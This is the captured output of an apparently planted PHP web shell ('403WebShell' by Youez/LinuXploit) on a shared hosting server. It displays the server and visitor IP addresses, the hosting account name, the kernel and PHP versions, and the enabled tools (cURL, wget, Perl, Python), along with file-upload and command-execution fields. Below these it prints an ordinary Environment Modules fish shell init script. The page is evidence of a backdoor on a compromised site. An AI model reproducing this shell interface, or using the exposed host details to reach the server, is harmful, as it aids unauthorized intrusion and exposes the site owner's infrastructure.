Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.117.91.170
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/Modules/init/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/Modules/init/fish
# define modules runtine quarantine configuration
set -xg MODULES_RUN_QUARANTINE 'LD_LIBRARY_PATH LD_PRELOAD'

# setup quarantine if defined
set _mlre '';
for _mlv in (string split ' ' $MODULES_RUN_QUARANTINE)
  if string match -r '^[A-Za-z_][A-Za-z0-9_]*$' $_mlv >/dev/null
     if set -q $_mlv
        set _mlre $_mlre$_mlv"_modquar='$$_mlv' "
     end
     set _mlrv "MODULES_RUNENV_$_mlv"
     set _mlre "$_mlre$_mlv='$$_mlrv' "
  end
end
if [ -n "$_mlre" ]
  set _mlre "env $_mlre"
end

# define module command and surrounding initial environment (default value
# for MODULESHOME, MODULEPATH, LOADEDMODULES and parse of init config files)
eval $_mlre /usr/bin/tclsh /usr/share/Modules/libexec/modulecmd.tcl fish autoinit | source -

# no environment alteration if the above autoinit command failed
if [ $status -eq 0 ]
   if status -i
      if [ -r /usr/share/Modules/init/fish_completion ]
         source /usr/share/Modules/init/fish_completion
      end
   end

   # no switchml definition since there is no Fish support in C version

   if not contains /usr/share/Modules/bin $PATH
      set -xg PATH /usr/share/Modules/bin $PATH
   end

   # initialize MANPATH if not set with a value that preserves manpath system
   # configuration even after addition of paths to this variable by modulefiles
   if not set -q MANPATH
      set -xg MANPATH :
   end
   if not string match -q '*:/usr/share/man:*' :(manpath ^/dev/null):
      if [ -z "$MANPATH" -o "$MANPATH" = ':' ]
         set _mlpathsep ''
      else
         set _mlpathsep :
      end
      set -xg MANPATH /usr/share/man$_mlpathsep$MANPATH
      set -e _mlpathsep
   end
end

# clean temp variables used to setup quarantine
set -e _mlre; set -e _mlv; set -e _mlrv;

Youez - 2016 - github.com/yon3zu
LinuXploit